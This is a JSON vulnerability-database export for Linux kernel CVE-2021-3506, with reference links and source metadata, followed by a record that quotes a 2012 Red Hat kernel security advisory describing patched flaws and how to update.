CVE-2016-2854, CVE-2018-5995, CVE-2019-19449,\n  CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672,\n  CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555,\n  CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129,\n  CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688,\n  CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033,\n  CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483,\n  CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612,\n  CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204,\n  CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008,\n  CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485,\n  CVE-2022-0492\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-3506",
        "trust": 2.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/03/28/2",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/08/1",
        "trust": 1.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163291",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163249",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166400",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166417",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163597",
        "trust": 0.7
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051016",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022032316",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2216",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1235",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2453",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2249",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163255",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163301",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163253",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-391284",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "id": "VAR-202104-1670",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T10:48:00.929000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=148827"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-3506 log"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-125",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944298"
      },
      {
        "trust": 1.8,
        "url": "https://www.openwall.com/lists/oss-security/2021/03/28/2"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/08/1"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210611-0007/"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 1.0,
        "url": "https://www.mail-archive.com/linux-kernel%40vger.kernel.org/msg2520013.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg2520013.html"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1235"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166400/ubuntu-security-notice-usn-5339-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051016"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166417/ubuntu-security-notice-usn-5343-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2453"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022032316"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163597/ubuntu-security-notice-usn-5016-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-out-of-bounds-memory-reading-via-remove-nats-in-journal-35115"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-5000-1"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-4997-1"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/125.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://seclists.org/oss-sec/2021/q2/107"
      },
      {
        "trust": 0.1,
        "url": "https://security.archlinux.org/cve-2021-3506"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5001-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4997-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-63.71~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1041.43"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5016-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1041.43~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-63.71"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1037.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1039.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1032.35"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1037.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1039.42~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1033.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2853"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12655"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20292"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5995"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5343-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19449"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2854"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1134.147"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1123.132"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1119.133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44733"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1038.43"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-173.182"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1124.133"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5339-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45095"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1090.99"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1110.113"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-04-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "date": "2021-04-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "date": "2021-06-23T15:38:23",
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "date": "2021-06-23T15:41:26",
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "date": "2021-06-27T12:22:22",
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "date": "2021-06-28T16:22:26",
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "date": "2021-06-23T15:33:13",
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "date": "2021-07-21T16:04:29",
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "date": "2022-03-23T16:02:30",
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "date": "2022-03-22T15:35:42",
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "date": "2021-04-19T22:15:13.110000",
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "date": "2021-04-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-01-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-391284"
      },
      {
        "date": "2021-05-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-3506"
      },
      {
        "date": "2023-11-07T03:38:03.463000",
        "db": "NVD",
        "id": "CVE-2021-3506"
      },
      {
        "date": "2022-03-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ],
    "trust": 1.4
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Buffer error vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-1357"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163255"
      },
      {
        "db": "PACKETSTORM",
        "id": "163291"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      }
    ],
    "trust": 0.6
  }
}

var-201205-0297
Vulnerability from variot

The Linux kernel before 3.3.1, when KVM is used, allows guest OS users to cause a denial of service (host OS crash) by leveraging administrative access to the guest OS, related to the pmd_none_or_clear_bad function and page faults for huge pages. Cross scripting and preconfigured password vulnerabilities have been reported to exist in the Quantum Scalar i500, Dell ML6000 and IBM TS3310 tape libraries. The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. Linux Kernel 2.6.x is vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2012:0743-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0743.html Issue date: 2012-06-18 CVE Names: CVE-2012-0044 CVE-2012-1179 CVE-2012-2119 CVE-2012-2121 CVE-2012-2123 CVE-2012-2136 CVE-2012-2137 CVE-2012-2372 CVE-2012-2373 =====================================================================

  1. Summary:

Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

This update fixes the following security issues:

  • A local, unprivileged user could use an integer overflow flaw in drm_mode_dirtyfb_ioctl() to cause a denial of service or escalate their privileges. (CVE-2012-0044, Important)

  • A buffer overflow flaw was found in the macvtap device driver, used for creating a bridged network between the guest and the host in KVM (Kernel-based Virtual Machine) environments. A privileged guest user in a KVM guest could use this flaw to crash the host. Note: This issue only affected hosts that have the vhost_net module loaded with the experimental_zcopytx module option enabled (it is not enabled by default), and that also have macvtap configured for at least one guest. (CVE-2012-2119, Important)

  • When a set user ID (setuid) application is executed, certain personality flags for controlling the application's behavior are cleared (that is, a privileged application will not be affected by those flags). It was found that those flags were not cleared if the application was made privileged via file system capabilities. A local, unprivileged user could use this flaw to change the behavior of such applications, allowing them to bypass intended restrictions. Note that for default installations, no application shipped by Red Hat for Red Hat Enterprise Linux is made privileged via file system capabilities. (CVE-2012-2123, Important)

  • It was found that the data_len parameter of the sock_alloc_send_pskb() function in the Linux kernel's networking implementation was not validated before use. A privileged guest user in a KVM guest could use this flaw to crash the host or, possibly, escalate their privileges on the host. (CVE-2012-2136, Important)

  • A buffer overflow flaw was found in the setup_routing_entry() function in the KVM subsystem of the Linux kernel in the way the Message Signaled Interrupts (MSI) routing entry was handled. A local, unprivileged user could use this flaw to cause a denial of service or, possibly, escalate their privileges. (CVE-2012-2137, Important)

  • A race condition was found in the Linux kernel's memory management subsystem in the way pmd_none_or_clear_bad(), when called with mmap_sem in read mode, and Transparent Huge Pages (THP) page faults interacted. A privileged user in a KVM guest with the ballooning functionality enabled could potentially use this flaw to crash the host. A local, unprivileged user could use this flaw to crash the system. (CVE-2012-1179, Moderate)

  • A flaw was found in the way device memory was handled during guest device removal. Upon successful device removal, memory used by the device was not properly unmapped from the corresponding IOMMU or properly released from the kernel, leading to a memory leak. A malicious user on a KVM host who has the ability to assign a device to a guest could use this flaw to crash the host. (CVE-2012-2121, Moderate)

  • A flaw was found in the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation. A local, unprivileged user could use this flaw to cause a denial of service. (CVE-2012-2372, Moderate)

  • A race condition was found in the Linux kernel's memory management subsystem in the way pmd_populate() and pte_offset_map_lock() interacted on 32-bit x86 systems with more than 4GB of RAM. A local, unprivileged user could use this flaw to cause a denial of service. (CVE-2012-2373, Moderate)

Red Hat would like to thank Chen Haogang for reporting CVE-2012-0044.

This update also fixes several bugs. Documentation for these changes will be available shortly from the Technical Notes document linked to in the References section.

Users should upgrade to these updated packages, which contain backported patches to correct these issues, and fix the bugs noted in the Technical Notes. The system must be rebooted for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (http://bugzilla.redhat.com/):

